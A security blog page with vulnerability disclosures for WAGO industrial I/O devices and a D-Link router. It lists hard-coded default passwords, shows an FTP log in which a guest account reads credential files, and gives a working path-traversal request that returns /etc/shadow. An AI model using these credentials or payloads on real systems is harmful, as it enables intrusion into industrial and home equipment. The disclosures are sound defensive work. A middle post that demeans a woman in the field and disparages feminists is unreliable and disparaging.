Wednesday, February 10, 2016

[ICS] WAGO IO 758-870, 750-849, 750-849 vulnerabilities

Reported these issues to WAGO via ICS-CERT last year. Initially, WAGO's team declared these reports as invalid because there is no Linux in the models and no Ethernet connectivity. My first reaction was lol & wtf - the vendor doesn't know about its own product. And then I sent the device manual URL to them, after which they went quiet.

Background
According to WAGO’s Web site, WAGO is an international company based in Germany. They operate production facilities in Germany, Switzerland, Poland, China, and India. WAGO maintains offices worldwide.

According to WAGO, its products are deployed across several sectors including manufacturing, building automation, electric generation, transportation, and others. WAGO estimates that these products are used worldwide.


Vulnerability Details

Weak Credential Management
CVE-ID: CVE-2015-6472

Affected models:

WAGO IO 750-849 & 750-881
Modular I/O System. WAGO-I/O-IPC web-based management

Order number        750-849
Firmware revision   01.01.27 (04)
Order number        750-849
Firmware revision   01.02.05 (03)

WAGO IO 758-870
Modular I/O System. WAGO-I/O-IPC web-based management

WAGO device models 750-849 and 750-881 come configured, by default, with three (3) accounts having default, hard-coded credentials.

admin - wago
user - user
guest - guest

WAGO device model 758-870 comes configured, by default, with five (5) accounts having default, hard-coded credentials.

root:wago
admin:wago
user:user
www:www
guest:guest

Impact
Attackers are able to exploit these vulnerabilities by using the default credentials to gain unauthorized administrative access to the systems.

No privilege separation
CVE-ID: CVE-2015-6473

Affected models:

WAGO IO 750-849 & 750-881
Modular I/O System. WAGO-I/O-IPC web-based management

Order number        750-849
Firmware revision   01.01.27 (04)
Order number        750-881
Firmware revision   01.02.05 (03)

All three accounts can manage the device via HTTP(S) with full privileges. There appears to be no privilege separation between them: once logged in as any of the three default accounts - admin, user, guest - all of the functionality is available.

Impact

Attackers can control the device using any of the three default accounts & perform any changes without any restrictions.

Insecure FTP configuration / filesystem permissions

CVE-ID: XXX

The WAGO IO 758-870 device also runs an FTP server. All five (5) users documented above can log in over FTP. The FTP server configuration and filesystem permissions are set up insecurely and allow unauthorized file access.

a. Log in to FTP as the 'guest' user.
b. Ideally, 'guest' should have no access outside the FTP root.
c. 'guest' can still access any filesystem location.
d. Multiple files across the filesystem have overly open / unrestricted access permissions; 'guest' can access multiple critical files.
e. Also, access control is not enforced sufficiently, consistently or correctly. For example, the 'guest' user is restricted and cannot download /etc/passwd on the first attempt. However, the system allows the download of /etc/passwd on a second attempt performed from a different directory with loose access permissions.


PoC

Connected to <IP>.

220 FTP server ready.
Name: guest
331 User guest OK. Password required
Password: 
230 OK. Current directory is /home/guest
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Extended Passive mode OK (|||53957|)
150 Accepted data connection
226-Options: -l 
226 0 matches total
ftp> ls
229 Extended Passive mode OK (|||24432|)
150 Accepted data connection
226-Options: -l 
226 0 matches total


ftp> ls /etc/

229 Extended Passive mode OK (|||29997|)
150 Accepted data connection
-rw-r--r--    1 0        0              44 Sep 27  2010 LICENSE
-rw-r--r--    1 0        0              22 Oct  1  2010 REVISIONS
-rw-rw-rw-    1 0        0              26 Jun  7  2010 TZ
-rw-r--r--    1 0        0              96 Oct  1  2010 VIDEO_MODES
-rwxr-xr-x    1 0        0             271 Oct  1  2010 cfg-kbus-irq.sh
drwxrwsrwx    2 0        0            2048 Mar  3 14:39 config-tools
-rw-r--r--    1 0        0             504 Oct  1  2010 fstab
-rw-r--r--    1 0        0              80 Oct  1  2010 group
-rw-r-----    1 0        0              27 Oct  1  2010 gshadow
-rw-r--r--    1 0        0              16 Oct  1  2010 homepartition
-rw-rw-rw-    1 0        0              12 Oct  1  2010 hostname
-rw-r--r--    1 0        0              20 Oct  1  2010 hosts
drwxr-xr-x    2 0        0            1024 Oct  1  2010 hotplug
drwxr-xr-x    3 0        0            1024 Oct  1  2010 hotplug.d
drwxr-xr-x    2 0        0            1024 Oct  1  2010 ifplugd
-rw-r--r--    1 0        0              58 Oct  1  2010 inetd.conf
drwxrwxrwx    2 0        0            1024 Mar  2 18:15 init.d
-rw-r--r--    1 0        0             319 Oct 27  2014 inittab
-rw-r--r--    1 0        0             842 Jun  7  2010 inputrc
-rw-r--r--    1 0        0             128 Jun  7  2010 ipkg.conf
drwxr-xr-x    2 0        0            1024 Jun 15 21:42 lighttpd
lrwxrwxrwx    1 0        0              12 Oct  1  2010 mtab -> /proc/mounts
drwxrwxrwx    6 0        0            1024 Feb 24 18:22 network
-rw-r--r--    1 0        0            1181 Oct  1  2010 nsswitch.conf
-rw-r--r--    1 0        0              40 Oct  1  2010 partitions
-rw-r--r--    1 0        0             459 Oct  1  2010 passwd
drwxr-xr-x    2 0        0            1024 Oct  1  2010 php5
------x---    1 0        0              53 Mar  3 14:40 pointercal
-rw-r--r--    1 0        0             536 Oct  1  2010 profile
-rw-r--r--    1 0        0             178 Oct  1  2010 protocols
-rw-r--r--    1 0        0               8 Jun  7  2010 pure-ftpd.conf
drwxrwxrwx    2 0        0            1024 Oct  1  2010 rc.d
-rw-rw-rw-    1 0        0              53 Oct  1  2010 resolv.conf
-rw-r--r--    1 0        0              14 Oct  1  2010 rootpartition
-rw-rw-rw-    1 0        0             341 Mar  2 17:08 rts3s.cfg
-rwxr-xr-x    1 0        0            3012 Jun  7  2010 screenrc
-rw-r--r--    1 0        0            9590 Oct  1  2010 services
-rw-r-----    1 0        0             338 Oct  1  2010 shadow
-rw-------    1 0        0             280 Oct  1  2010 shadow-
-r--r-----    1 0        0            1712 Jun  7  2010 sudoers
-rwxrwxrwx    1 0        0              25 Jun  7  2010 timezone
-rwxr-xr-x    1 0        0             511 Mar  3 14:37 ts.conf
drwxr-xr-x    3 0        0            1024 Oct  1  2010 udev
-rwxr-xr--    1 0        0             798 Oct  1  2010 udhcpc.script
-rw-r--r--    1 0        0             357 Jun 15 21:42 webserver_conf.xml


226-Options: -l 

226 45 matches total

Note: As seen above, access permissions are too open on multiple files and directories.

ftp> get /etc/shadow
local: /etc/shadow remote: /etc/shadow
ftp: Can't access `/etc/shadow': Permission denied
ftp> get /etc/passwd
local: /etc/passwd remote: /etc/passwd
ftp: Can't access `/etc/passwd': Permission denied
ftp> get /etc/webserver_conf.xml
local: /etc/webserver_conf.xml remote: /etc/webserver_conf.xml
ftp: Can't access `/etc/webserver_conf.xml': Permission denied
ftp> get /etc/pure-ftpd.conf
local: /etc/pure-ftpd.conf remote: /etc/pure-ftpd.conf
ftp: Can't access `/etc/pure-ftpd.conf': Permission denied

ftp> cd /etc/lighttpd <— drwxr-xr-x
250 OK. Current directory is /etc/lighttpd
ftp> ls
229 Extended Passive mode OK (|||10281|)
150 Accepted data connection
-rw-r--r--    1 12       102            65 Jun  7  2010 lighttpd-htpasswd.user
-rw-r--r--    1 12       102          3743 Jun 15 21:42 lighttpd.conf
-rw-r--r--    1 12       102           414 Jun  7  2010 mod_fastcgi.conf

226-Options: -l 
226 3 matches total

ftp> get lighttpd-htpasswd.user
local: lighttpd-htpasswd.user remote: lighttpd-htpasswd.user
229 Extended Passive mode OK (|||52622|)
150 Accepted data connection
100% |***********************************************************************************************************|    65      484.55 KiB/s    00:00 ETA

226-File successfully transferred

226 0.001 seconds (measured here), 71.89 Kbytes per second
65 bytes received in 00:00 (3.14 KiB/s)
ftp> 

ftp> get lighttpd.conf
local: lighttpd.conf remote: lighttpd.conf
229 Extended Passive mode OK (|||9954|)
150 Accepted data connection
100% |***********************************************************************************************************|  3743      243.10 KiB/s    00:00 ETA

226-File successfully transferred

226 0.015 seconds (measured here), 249.64 Kbytes per second
3743 bytes received in 00:00 (160.62 KiB/s)
…..

Note: Above configuration files contain credentials.

Once in this directory, we can also access the /etc/passwd file.
Note: /etc/shadow still cannot be accessed.

ftp> get /etc/passwd

local: /etc/passwd remote: /etc/passwd
229 Extended Passive mode OK (|||1859|)
150 Accepted data connection
100% |***********************************************************************************************************|   459        3.77 MiB/s    00:00 ETA

226-File successfully transferred

226 0.003 seconds (measured here), 143.76 Kbytes per second
459 bytes received in 00:00 (35.35 KiB/s)

ftp> get /etc/shadow

local: /etc/shadow remote: /etc/shadow
229 Extended Passive mode OK (|||61612|)
550 Can't open shadow: Permission denied
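The permission problems the listing above exposes can be picked out mechanically. This added example (not part of the original post) parses ls -l style lines like those the device's FTP server returns and flags world-writable entries, world-writable directories lacking the sticky bit, and secret files that are world-readable; the sample listing and the set of secret file names are constructed here for illustration.

```python
import re
import stat

# Constructed sample: lines copied in shape from the `ls /etc/` and /etc/lighttpd
# listings above (mode, links, uid, gid, size, date, name).
SAMPLE_LISTING = """\
-rw-rw-rw-    1 0        0              12 Oct  1  2010 hostname
drwxrwxrwx    2 0        0            1024 Mar  2 18:15 init.d
drwxrwsrwx    2 0        0            2048 Mar  3 14:39 config-tools
-rw-r-----    1 0        0             338 Oct  1  2010 shadow
-rwxrwxrwx    1 0        0              25 Jun  7  2010 timezone
lrwxrwxrwx    1 0        0              12 Oct  1  2010 mtab -> /proc/mounts
-rw-r--r--    1 12       102            65 Jun  7  2010 lighttpd-htpasswd.user
"""
# Files that must never be world-readable (assumed list; extend for your system).
SECRET_FILES = {"shadow", "shadow-", "gshadow", "sudoers", "lighttpd-htpasswd.user"}
# mode, links, uid, gid, size, three date fields, name
LINE_RE = re.compile(r"^([-dlbcps][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$")
PERM_BITS = [stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR, stat.S_IRGRP, stat.S_IWGRP,
             stat.S_IXGRP, stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH]
SPECIAL_BITS = [stat.S_ISUID, stat.S_ISGID, stat.S_ISVTX]

def parse_mode(mode_str):
    """Convert an ls-style mode string such as "drwxrwsrwx" into st_mode bits."""
    bits = 0
    for i, ch in enumerate(mode_str[1:10]):
        if ch in "rwxst":            # s/t imply the execute bit as well
            bits |= PERM_BITS[i]
        if ch in "sStT":             # setuid / setgid / sticky
            bits |= SPECIAL_BITS[i // 3]
    return bits

def audit_listing(listing):
    """Map each entry with a too-open mode to the list of problems found."""
    findings = {}
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1)[0] == "l":   # symlinks always show lrwxrwxrwx
            continue
        mode_str, name = m.group(1), m.group(2).split(" -> ")[0]
        mode, problems = parse_mode(mode_str), []
        if mode & stat.S_IWOTH:
            problems.append("world-writable")
            if mode_str[0] == "d" and not mode & stat.S_ISVTX:
                problems.append("no-sticky-bit")    # anyone may delete/rename entries
        if name in SECRET_FILES and mode & stat.S_IROTH:
            problems.append("secret-world-readable")
        if problems:
            findings[name] = problems
    return findings
```

Run against a listing captured from your own device, the output is the list of entries to tighten with chmod before the FTP chroot is fixed.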

+++++


InfoSec/Pentesting - a dude's gang?

I was browsing the interwebs and came across one blog post (link below). It is always nice to read about other people's experiences, their plan of action, their thought process, when working towards a certification, or, any other objective for that matter.

The poster is sharing her experience with OSCP certification (Pentesting with Kali). It is a fairly okay read. She passed the OSCP and it is definitely worth a genuine Congratulations!


Personally, though, her last statement turned the entire writeup sour. She says & I quote:
"Being a woman in Infosec isn't easy. But to earn the respect of this dude’s gang, you need to play it right."


Now, I do not know her personally or professionally. But that last closing statement sounded very much like a feminist. And I wanted to put forth my views on it.


+++++
"Being a woman in infosec isn't easy."
InfoSec & Penetration testing, to be specific, is a dynamic, specialized domain. You've got to consistently, & continuously, study, research, discuss, learn, share, practice, and then learn some more. And this is expected of any InfoSec professional - not just a 'woman.' It is stupid & pointless that she chose to add a 'woman' in this statement. Somehow, she seems to expect that women should have a different, simplified playing field in InfoSec than their male counterparts. A typical feminist attribute.

Oh you're a girl in this male-dominated InfoSec club? Let me make it easy for you. Here, I have pwn'd this box, these are the creds, you only ssh in, just take screen caps and focus on looking good in customer debriefs. Alright?


"But to earn the respect of this dude's gang, you need to play it right."
Ridiculous, uneducated & a skewed viewpoint. There is no InfoSec dude's brotherhood, no InfoSec crips & bloods or InfoSec KKK clans, keeping women out.

Professional respect is NOT based on gender. Remember (RIP) Shon Harris?

To earn professional respect, a lot of effort goes in & rightly so. First & foremost, you must have an unshakeable passion - a passion to learn continuously, irrespective of how much you already know or how much you have grown in your career & finances. An undying passion to go on learning, & researching, sharing with community, and simply to do more.

Next, you've got to toil. There is no short-cut. There is no substitute for hard-work, perseverance, passion, commitment & of course coffee. This is how someone plays right.

If you are genuinely & passionately putting in the efforts, professional respect will come in automagically. Everyone should strive for it, but focus must always be on giving your best, even if your peers or boss ignore / downplay your accomplishments.

+++++

As if feminists hadn't had much evil fun in other aspects of life, it would be a pity if their creepy ideology seeped into the InfoSec industry.

Comments are welcome.

Thursday, February 4, 2016

DLink DVG-N5402SP Multiple Vulnerabilities

# Exploit Title: [DLink DVG-N5402SP Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.dlink.com/]
# Versions Reported: [Multiple - See below]
# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]

DLink DVG-N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

Vulnerable Models, Firmware, Hardware versions
DVG-N5402SP Web Management
Model Name : GPN2.4P21-C-CN
Firmware Version : W1000CN-00
Firmware Version : W1000CN-03
Firmware Version : W2000EN-00
Hardware Platform : ZS
Hardware Version : Gpn2.4P21-C_WIFI-V0.05

The device can be managed through three user accounts:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

1. Path traversal
Arbitrary files can be read off of the device file system. No authentication is required to exploit this vulnerability.
CVE-ID: CVE-2015-7245

HTTP Request

POST /cgi-bin/webproc HTTP/1.1
Host: :8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

HTTP Response

HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage; pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:-
pstVal->name:obj-action; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

#root::13796:0:99999:7:::
root::13796:0:99999:7:::
#tw::13796:0:99999:7:::
#tw::13796:0:99999:7:::
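The root cause is that the errorpage parameter is used as a file path without being confined to the web root. As an added example (not D-Link code and not from the original advisory), here is the vulnerable join beside a hardened resolver, run over a constructed body in the shape of the PoC above; the /www web root is an assumption.

```python
import posixpath
from urllib.parse import parse_qs

# Assumed document root of the device's web server (hypothetical; the real path is unknown).
WEBROOT = "/www"

# Constructed POST body in the shape of the PoC above; only the page-selecting
# parameters matter for this check, so the login fields are abbreviated.
SAMPLE_BODY = ("getpage=html%2Findex.html"
               "&errorpage=../../../../../../../../../../../etc/shadow"
               "&obj-action=auth&%3Aaction=login")


def resolve_unsafe(webroot, requested):
    """The vulnerable pattern: the parameter is joined onto the web root as-is,
    so "../" sequences walk straight out of it (as the shadow file above shows)."""
    return posixpath.normpath(posixpath.join(webroot, requested))


def resolve_safe(webroot, requested):
    """Confine a requested page to the web root.

    Returns the resolved path, or None when the request would escape the root.
    Operates on the already URL-decoded value (parse_qs decodes once)."""
    if "\x00" in requested:                     # NUL would truncate a C path string
        return None
    root = posixpath.normpath(webroot)
    # Strip leading slashes so the parameter can never be treated as absolute.
    full = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if posixpath.commonpath([root, full]) != root:
        return None
    return full


def check_page_params(webroot, body):
    """Resolve every page-selecting parameter of a webproc-style POST body."""
    params = parse_qs(body, keep_blank_values=True)
    return {key: resolve_safe(webroot, params[key][0])
            for key in ("getpage", "errorpage") if key in params}
```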

2. Use of Default, Hard-Coded Credentials
CVE-ID: CVE-2015-7246

The device has two system user accounts configured with default passwords (root:root, tw:tw).
The 'tw' login is not active, though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled), leading to loss of integrity, confidentiality, or availability.

3. Sensitive info leakage via device running configuration backup
CVE-ID: CVE-2015-7247

Usernames, passwords, keys, values, and web account hashes (super & admin) are stored in clear text and not masked. Note that the restricted 'support' user may also access this config backup file directly from the portal, gather clear-text admin credentials, and gain full, unauthorized access to the device.

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.